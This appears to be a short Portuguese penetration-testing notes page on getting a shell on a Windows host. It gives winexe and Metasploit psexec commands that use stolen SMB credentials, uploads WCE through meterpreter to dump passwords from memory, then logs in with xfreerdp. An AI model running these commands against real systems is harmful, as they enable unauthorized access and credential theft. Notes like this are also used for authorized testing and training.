Obtendo shell no host
Vamos supor que o TS não esteja habilitado e só conseguimos validar o SMB. Podemos utilizar as credenciais para obter acesso e executar comandos no servidor. Para isso vamos utilizar o winexe.
winexe -U <usuario>%<senha> //<ip servidor> cmd.exe
Ou podemos utilizar o módulo do metasploit chamado psexec.
msf > search psexec
Após conseguir um meterpreter podemos fazer o upload do wce64.exe e buscar as informações em memória.
upload usr/share/windows-resources/wce/wce64.exe c:
C:\>wce64.exe -w
Após isso, se tivermos sucesso descobrindo alguma outra senha, podemos utilizar o xfreerdp para fazer o login.
xfreerdp /u:<usuário adm> /p:<senha adm> /v:<host>
Last updated
Was this helpful?